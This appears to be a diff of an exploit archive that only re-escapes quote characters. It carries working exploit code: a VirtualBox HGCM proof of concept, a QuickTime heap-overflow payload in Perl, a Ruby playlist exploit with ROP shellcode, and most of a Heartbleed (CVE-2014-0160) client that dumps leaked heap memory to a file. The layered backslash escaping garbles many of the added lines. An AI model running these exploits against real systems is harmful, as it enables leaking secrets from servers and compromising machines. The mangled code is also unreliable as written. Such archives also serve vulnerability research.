-        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
+        printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
    }
    else{
-        printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
+        printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
        exit(EXIT_FAILURE);
    }
@ -676,19 +676,19 @@ void poc(int option){
    switch (option){
    case 1:
-        printf("[1] triggering the first bug...\n");
+        printf(\"[1] triggering the first bug...\\n\");
        trigger_message_readback(hDevice, u32ClientID);
        break;
    case 2:
-        printf("[2] triggering the second bug...\n");
+        printf(\"[2] triggering the second bug...\\n\");
        trigger_message_writeback(hDevice, u32ClientID);
        break;
    case 3:
-        printf("[3] triggering the third bug...\n");
+        printf(\"[3] triggering the third bug...\\n\");
        trigger_opcode_0xea(hDevice, u32ClientID);
        break;
    default:
-        printf("[!] Unknown option %d.\n", option);
+        printf(\"[!] Unknown option %d.\\n\", option);
    }
    /* Disconnect from the VBoxSharedCrOpenGL service */
@ -702,13 +702,13 @@ void poc(int option){
 int main(int argc, char* argv[])
 {
    if (argc < 2){
-        printf("Usage: %s <option number>\n\n", argv[0]);
+        printf(\"Usage: %s <option number>\\n\\n\", argv[0]);
-        printf("* Option 1: trigger the vulnerability in the
+        printf(\"* Option 1: trigger the vulnerability in the
-crNetRecvReadback function.\n");
+crNetRecvReadback function.\\n\");
-        printf("* Option 2: trigger the vulnerability in the
+        printf(\"* Option 2: trigger the vulnerability in the
-crNetRecvWriteback function.\n");
+crNetRecvWriteback function.\\n\");
-        printf("* Option 3: trigger the vulnerability in the
+        printf(\"* Option 3: trigger the vulnerability in the
-crServerDispatchVertexAttrib4NubARB function.\n");
+crServerDispatchVertexAttrib4NubARB function.\\n\");
        exit(1);
    }
    poc(atoi(argv[1]));
@ -816,8 +816,8 @@ effectively secure their organizations.
-Core Security's software solutions build on over a decade of trusted
+Core Security\'s software solutions build on over a decade of trusted
-research and leading-edge threat expertise from the company's Security
+research and leading-edge threat expertise from the company\'s Security
 Consulting Services, CoreLabs and Engineering groups. Core Security
 Technologies can be reached at +1 (617) 399-6980 or on the Web at:
 http://www.coresecurity.com.
--- a/platforms/multiple/dos/39165.txt
+++ b/platforms/multiple/dos/39165.txt
@ -33,8 +33,8 @@ Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
    #0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795
  This frame has 2 object(s):
-    [32, 36) 'input' <== Memory access at offset 36 overflows this variable
+    [32, 36) \'input\' <== Memory access at offset 36 overflows this variable
-    [48, 52) 'nresults'
+    [48, 52) \'nresults\'
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
@ -74,7 +74,7 @@ Shadow byte legend (one shadow byte represents 8 application bytes):
 ==22207==ABORTING
 --- cut ---
-While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
+While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds \"write\" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.
--- a/platforms/multiple/dos/6471.pl
+++ b/platforms/multiple/dos/6471.pl
@ -3,35 +3,35 @@
 # Vendor: http://www.apple.com/
 # Risk : high
 #  
-# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
+# The \"<? quicktime type= ?>\" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
 # This bug can be remote or local, Quicktime/Itunes parse any supplied file for  a reconized header even if the header is not  corresponding
 # to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
 # remote crash on firefox, IE and any browser using the Quicktime plugin.
 # Code execution may be possible.
 my $payload =
-"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f".
+\"\\x3c\\x3f\\x78\\x6d\\x6c\\x20\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x3d\\x22\\x31\\x2e\\x30\\x22\\x3f\".
-"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d".
+\"\\x3e\\x0d\\x0a\\x3c\\x3f\\x71\\x75\\x69\\x63\\x6b\\x74\\x69\\x6d\\x65\\x20\\x74\\x79\\x70\\x65\\x3d\".
-"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b".
+\"\\x22\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x2d\\x71\\x75\\x69\\x63\\x6b\".
-"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20".
+\"\\x74\\x69\\x6d\\x65\\x2d\\x6d\\x65\\x64\\x69\\x61\\x2d\\x6c\\x69\\x6e\\x6b\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
-"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e".
+\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x22\\x3f\\x3e\".
-"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f".
+\"\\x0d\\x0a\\x3c\\x65\\x6d\\x62\\x65\\x64\\x20\\x73\\x72\\x63\\x3d\\x22\\x72\\x74\\x73\\x70\\x3a\\x2f\".
-"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d".
+\"\\x2f\\x6e\\x6f\\x73\\x69\\x74\\x65\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x6f\\x76\\x69\\x64\\x7a\\x2e\\x6d\".
-"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76".
+\"\\x6f\\x76\\x22\\x20\\x61\\x75\\x74\\x6f\\x70\\x6c\\x61\\x79\\x3d\\x22\\x77\\x68\\x61\\x74\\x65\\x76\".
-"\x65\x72\x22\x20\x2f\x3e\x00";
+\"\\x65\\x72\\x22\\x20\\x2f\\x3e\\x00\";
-my $file="crash.mov";
+my $file=\"crash.mov\";
-open(my $file, ">>$file") or die "Cannot open $file: $!";
+open(my $file, \">>$file\") or die \"Cannot open $file: $!\";
 print $file $payload;
 close($file);
--- a/platforms/multiple/dos/9323.txt
+++ b/platforms/multiple/dos/9323.txt
@ -1,4 +1,4 @@
-Sun's VirtualBox host reboot PoC
+Sun\\\'s VirtualBox host reboot PoC
 by Tadas Vilkeliskis <vilkeliskis.t@gmail.com>
 Disclosure made at 2009-08-01
--- a/platforms/multiple/local/11491.rb
+++ b/platforms/multiple/local/11491.rb
@ -18,43 +18,43 @@ JMP_EAX = 0x8fe24459
 def make_exec_payload_from_heap_stub()
 frag0 =
-"\x90" + # nop
+\\\"\\\\x90\\\" + # nop
-"\x58" + # pop eax
+\\\"\\\\x58\\\" + # pop eax
-"\x61" + # popa
+\\\"\\\\x61\\\" + # popa
-"\xc3" # ret
+\\\"\\\\xc3\\\" # ret
 frag1 =
-"\x90" + # nop
+\\\"\\\\x90\\\" + # nop
-"\x58" + # pop eax
+\\\"\\\\x58\\\" + # pop eax
-"\x89\xe0" + # mov eax, esp
+\\\"\\\\x89\\\\xe0\\\" + # mov eax, esp
-"\x83\xc0\x0c" + # add eax, byte +0xc
+\\\"\\\\x83\\\\xc0\\\\x0c\\\" + # add eax, byte +0xc
-"\x89\x44\x24\x08" + # mov [esp+0x8], eax
+\\\"\\\\x89\\\\x44\\\\x24\\\\x08\\\" + # mov [esp+0x8], eax
-"\xc3" # ret
+\\\"\\\\xc3\\\" # ret
 exec_payload_from_heap_stub =
 frag0 +
-[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
+[SETJMP, JMP_BUF + 32, JMP_BUF].pack(\\\"V3\\\") +
 frag1 +
-"X" * 20 +
+\\\"X\\\" * 20 +
 [SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
-JMP_EAX].pack("V5") +
+JMP_EAX].pack(\\\"V5\\\") +
-"X" * 4
+\\\"X\\\" * 4
 end
-payload_cmd = "hereisthetrick"
+payload_cmd = \\\"hereisthetrick\\\"
 stub = make_exec_payload_from_heap_stub()
-ext = "A" * 59
+ext = \\\"A\\\" * 59
 stub = make_exec_payload_from_heap_stub()
 exploit = ext + stub + payload_cmd
 # pls file format
-file = "[playlist]\n"
+file = \\\"[playlist]\\\\n\\\"
-file += "NumberOfEntries=1\n"
+file += \\\"NumberOfEntries=1\\\\n\\\"
-file += "File1=http://1/asdf." + exploit + "\n"
+file += \\\"File1=http://1/asdf.\\\" + exploit + \\\"\\\\n\\\"
-file += "Title1=asdf\n"
+file += \\\"Title1=asdf\\\\n\\\"
-file += "Length1=100\n"
+file += \\\"Length1=100\\\\n\\\"
-file += "Version=2" + '\n'
+file += \\\"Version=2\\\" + \\\'\\\\n\\\'
-File.open('poc.pls','w') do |f|
+File.open(\\\'poc.pls\\\',\\\'w\\\') do |f|
 f.puts file
 f.close
 end
--- a/platforms/multiple/remote/32791.c
+++ b/platforms/multiple/remote/32791.c
@ -16,7 +16,7 @@
 * and can be run in a loop until the connected peer ends connection.
 * The data leaked contains 16 bytes of random padding at the end.
 * The exploit can be used against a connecting client or server,
-* it can also send pre_cmd's to plain-text services to establish
+* it can also send pre_cmd\\\'s to plain-text services to establish
 * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
 * will often forcefully close the connection during large leak
 * requests so try to lower your payload request size. 
@ -35,23 +35,23 @@
 * [ decrypting SSL packet
 * [ heartbleed leaked length=65535
 * [ final record type=24, length=16384
-* [ wrote 16381 bytes of heap to file 'out'
+* [ wrote 16381 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
-* [ wrote 16384 bytes of heap to file 'out'
+* [ wrote 16384 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
-* [ wrote 16384 bytes of heap to file 'out'
+* [ wrote 16384 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
-* [ wrote 16384 bytes of heap to file 'out'
+* [ wrote 16384 bytes of heap to file \\\'out\\\'
 * [ heartbeat returned type=24 length=42
 * [ decrypting SSL packet
 * [ final record type=24, length=18
-* [ wrote 18 bytes of heap to file 'out'
+* [ wrote 18 bytes of heap to file \\\'out\\\'
 * [ done.
 * $ ls -al out
 * -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
@ -60,11 +60,11 @@
 *
 * Use following example command to generate certificates for clients.
 *
-* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
+* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\\
 * -keyout server.key -out server.crt
 *
-* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
+* Debian compile with \\\"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\\
-* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" 
+* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\\\" 
 *
 * todo: add udp/dtls support.
 *
@ -93,9 +93,9 @@
 #include <openssl/rand.h>
 #include <openssl/buffer.h>
-#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\\
 		(((unsigned int)(c[1]))    )),c+=2)
-#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\\
 		 c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
 int first = 0;
@ -135,20 +135,20 @@ int tcp_connect(char* server,int port){
        host = gethostbyname(server);
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd==-1){
-		printf("[!] cannot create socket\n");
+		printf(\\\"[!] cannot create socket\\\\n\\\");
 		exit(0);
 	}
 	sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
        bzero(&(sa.sin_zero),8);
-	printf("[ connecting to %s %d/tcp\n",server,port);
+	printf(\\\"[ connecting to %s %d/tcp\\\\n\\\",server,port);
        ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
 	if(ret==0){
-		printf("[ connected to %s %d/tcp\n",server,port);
+		printf(\\\"[ connected to %s %d/tcp\\\\n\\\",server,port);
 	}
 	else{
-		printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
+		printf(\\\"[!] FATAL: could not connect to %s %d/tcp\\\\n\\\",server,port);
 		exit(0);
 	}
 	return sd;
@ -161,7 +161,7 @@ int tcp_bind(char* server, int port){
 	host = gethostbyname(server);
 	sd=socket(AF_INET,SOCK_STREAM,0);
 	if(sd==-1){
-    		printf("[!] cannot create socket\n");
+    		printf(\\\"[!] cannot create socket\\\\n\\\");
 		exit(0);
 	}
 	memset(&sin,0,sizeof(sin));
@ -171,7 +171,7 @@ int tcp_bind(char* server, int port){
    	setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
 	ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
 	if(ret==-1){
-		printf("[!] cannot bind socket\n");
+		printf(\\\"[!] cannot bind socket\\\\n\\\");
 		exit(0);
 	}
 	listen(sd,5);
@ -191,7 +191,7 @@ connection* tls_connect(int sd){
        connection *c;
 	c = malloc(sizeof(connection));
        if(c==NULL){
-		printf("[ error in malloc()\n");
+		printf(\\\"[ error in malloc()\\\\n\\\");
 		exit(0);
 	}
 	c->socket = sd;
@ -210,7 +210,7 @@ connection* tls_connect(int sd){
                ERR_print_errors_fp(stderr);
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
-                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
+                printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
        }
 	return c;
 }
@ -221,13 +221,13 @@ connection* tls_bind(int sd){
        char* buf;
 	buf = malloc(4096);
        if(buf==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	memset(buf,0,4096);
 	c = malloc(sizeof(connection));
 	if(c==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	c->socket = sd;
@ -238,10 +238,10 @@ connection* tls_bind(int sd){
                ERR_print_errors_fp(stderr);
 	SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
 	SSL_CTX_SRP_CTX_init(c->sslContext);
-	SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
+	SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
-	SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);       
+	SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);       
 	if(!SSL_CTX_check_private_key(c->sslContext)){
-		printf("[!] FATAL: private key does not match the certificate public key\n");
+		printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
 		exit(0);
 	}
 	c->sslHandle = SSL_new(c->sslContext);
@ -250,12 +250,12 @@ connection* tls_bind(int sd){
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        int rc = SSL_accept(c->sslHandle);
-	printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
+	printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
 	bytes = SSL_read(c->sslHandle, buf, 4095);
-	printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
+	printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
 	if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
-                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
+                printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
        }
        return c;
 }
@ -269,16 +269,16 @@ int pre_cmd(int sd,int precmd,int verbose){
 	char* line2;  
 	switch(precmd){
 		case 0:
-			line1 = "EHLO test\n";
+			line1 = \\\"EHLO test\\\\n\\\";
-			line2 = "STARTTLS\n";
+			line2 = \\\"STARTTLS\\\\n\\\";
 			break;
 		case 1:
-			line1 = "CAPA\n";
+			line1 = \\\"CAPA\\\\n\\\";
-			line2 = "STLS\n";
+			line2 = \\\"STLS\\\\n\\\";
 			break;
 		case 2:
-			line1 = "a001 CAPB\n";
+			line1 = \\\"a001 CAPB\\\\n\\\";
-			line2 = "a002 STARTTLS\n";
+			line2 = \\\"a002 STARTTLS\\\\n\\\";
 			break;
 		default:
 			go = 1;
@ -287,23 +287,23 @@ int pre_cmd(int sd,int precmd,int verbose){
 	if(go==0){
 		buffer = malloc(2049);
 	        if(buffer==NULL){
-                	printf("[ error in malloc()\n");
+                	printf(\\\"[ error in malloc()\\\\n\\\");
                	exit(0);
 	        }
 		memset(buffer,0,2049);
 		rc = read(sd,buffer,2048);
-		printf("[ banner: %s",buffer);
+		printf(\\\"[ banner: %s\\\",buffer);
 		send(sd,line1,strlen(line1),0);
 		memset(buffer,0,2049);
 		rc = read(sd,buffer,2048);
 		if(verbose==1){
-			printf("%s\n",buffer);
+			printf(\\\"%s\\\\n\\\",buffer);
 		}
 		send(sd,line2,strlen(line2),0);
 		memset(buffer,0,2049);
 		rc = read(sd,buffer,2048);
 		if(verbose==1){
-			printf("%s\n",buffer);
+			printf(\\\"%s\\\\n\\\",buffer);
 		}
 	}
 	return sd;
@ -314,7 +314,7 @@ void* heartbleed(connection *c,unsigned int type){
        int ret;
 	buf = OPENSSL_malloc(1 + 2);
 	if(buf==NULL){
-                printf("[ error in malloc()\n");
+                printf(\\\"[ error in malloc()\\\\n\\\");
                exit(0);
        }
 	p = buf;
@ -327,11 +327,11 @@ void* heartbleed(connection *c,unsigned int type){
 			s2n(0xffff,p);
 			break;
 		default:
-			printf("[ setting heartbeat payload_length to %u\n",type);
+			printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
 			s2n(type,p);
 			break;
 	}
-	printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
+	printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
        ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
        OPENSSL_free(buf);
 	return c;
@ -368,18 +368,18 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
                        version=(ssl_major<<8)|ssl_minor;
                        n2s(p,rr->length);
 			if(rr->type==24){
-				printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
+				printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
 				if(rr->length > 16834){
-					printf("[ error: got a malformed TLS length.\n");
+					printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
 					exit(0);
 				}
 			}
 			else{
-				printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
+				printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
 				s->packet_length=0;
 				badpackets++;
 				if(badpackets > 3){
-					printf("[ error: too many bad packets recieved\n");
+					printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
 					exit(0);
 				}
 				goto apple;
@ -390,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0) goto apple; 
        }
-	printf("[ decrypting SSL packet\n");
+	printf(\\\"[ decrypting SSL packet\\\\n\\\");
        s->rstate=SSL_ST_READ_HEADER; 
        rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
        rr->data=rr->input;
@ -457,11 +457,11 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
 		heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
 		first = 2;
 		leakbytes = heartbleed_len + 16;
-		printf("[ heartbleed leaked length=%u\n",heartbleed_len);
+		printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
 	}
 	if(verbose==1){
-		{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
+		{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
-                printf("\n");
+                printf(\\\"\\\\n\\\");
        }
 	leakbytes-=rr->length;
 	if(leakbytes > 0){
@ -470,7 +470,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
 	else{
 		repeat = 0;
 	}
-	printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
+	printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
 	int output = s->s3->rrec.length-3;
 	if(output > 0){
 		int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
@ -478,48 +478,48 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
 			first--;
 			write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
 			/* first three bytes are resp+len */
-			printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
+			printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
 		}
 		else{
 			/* heap data & 16 bytes padding */
 			write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
-			printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
+			printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
 		}
 		close(fd);
 	}
 	else{
-		printf("[ nothing from the heap to write\n");
+		printf(\\\"[ nothing from the heap to write\\\\n\\\");
 	}
 	return;
 apple:
-        printf("[ problem handling SSL record packet - wrong type?\n");
+        printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
 	badpackets++;
 	if(badpackets > 3){
-		printf("[ error: too many bad packets recieved\n");
+		printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
 		exit(0);
 	}
 	return;
 }
 void usage(){
-	printf("[\n");
+	printf(\\\"[\\\\n\\\");
-	printf("[ --server|-s <ip/dns>    - the server to target\n");
+	printf(\\\"[ --server|-s <ip/dns>    - the server to target\\\\n\\\");
-	printf("[ --port|-p   <port>      - the port to target\n");
+	printf(\\\"[ --port|-p   <port>      - the port to target\\\\n\\\");
-	printf("[ --file|-f   <filename>  - file to write data to\n");
+	printf(\\\"[ --file|-f   <filename>  - file to write data to\\\\n\\\");
-	printf("[ --bind|-b   <ip>        - bind to ip for exploiting clients\n");
+	printf(\\\"[ --bind|-b   <ip>        - bind to ip for exploiting clients\\\\n\\\");
-	printf("[ --precmd|-c <n>         - send precmd buffer (STARTTLS)\n");
+	printf(\\\"[ --precmd|-c <n>         - send precmd buffer (STARTTLS)\\\\n\\\");
-	printf("[			    0 = SMTP\n");
+	printf(\\\"[			    0 = SMTP\\\\n\\\");
-	printf("[			    1 = POP3\n");
+	printf(\\\"[			    1 = POP3\\\\n\\\");
-	printf("[			    2 = IMAP\n");
+	printf(\\\"[			    2 = IMAP\\\\n\\\");
-	printf("[ --loop|-l		  - loop the exploit attempts\n");
+	printf(\\\"[ --loop|-l		  - loop the exploit attempts\\\\n\\\");
-	printf("[ --type|-t   <n>         - select exploit to try\n");
+	printf(\\\"[ --type|-t   <n>         - select exploit to try\\\\n\\\");
-	printf("[                           0 = null length\n");
+	printf(\\\"[                           0 = null length\\\\n\\\");
-	printf("[			    1 = max leak\n");
+	printf(\\\"[			    1 = max leak\\\\n\\\");
-	printf("[			    n = heartbeat payload_length\n");
+	printf(\\\"[			    n = heartbeat payload_length\\\\n\\\");
-	printf("[\n");
+	printf(\\\"[\\\\n\\\");
-	printf("[ --verbose|-v            - output leak to screen\n");
+	printf(\\\"[ --verbose|-v            - output leak to screen\\\\n\\\");
-	printf("[ --help|-h               - this output\n");
+	printf(\\\"[ --help|-h               - this output\\\\n\\\");
-	printf("[\n");
+	printf(\\\"[\\\\n\\\");
 	exit(0);
 }
@ -531,88 +531,88 @@ int main(int argc, char* argv[]){
 	connection* c;
 	char *host, *file;
 	int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
-	printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
+	printf(\\\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\\\n\\\");
-	printf("[ =============================================================\n");
+	printf(\\\"[ =============================================================\\\\n\\\");
        static struct option options[] = {
-        	{"server", 1, 0, 's'},
+        	{\\\"server\\\", 1, 0, \\\'s\\\'},
-	        {"port", 1, 0, 'p'},
+	        {\\\"port\\\", 1, 0, \\\'p\\\'},
-		{"file", 1, 0, 'f'},
+		{\\\"file\\\", 1, 0, \\\'f\\\'},
-		{"type", 1, 0, 't'},
+		{\\\"type\\\", 1, 0, \\\'t\\\'},
-		{"bind", 1, 0, 'b'},
+		{\\\"bind\\\", 1, 0, \\\'b\\\'},
-		{"verbose", 0, 0, 'v'},
+		{\\\"verbose\\\", 0, 0, \\\'v\\\'},
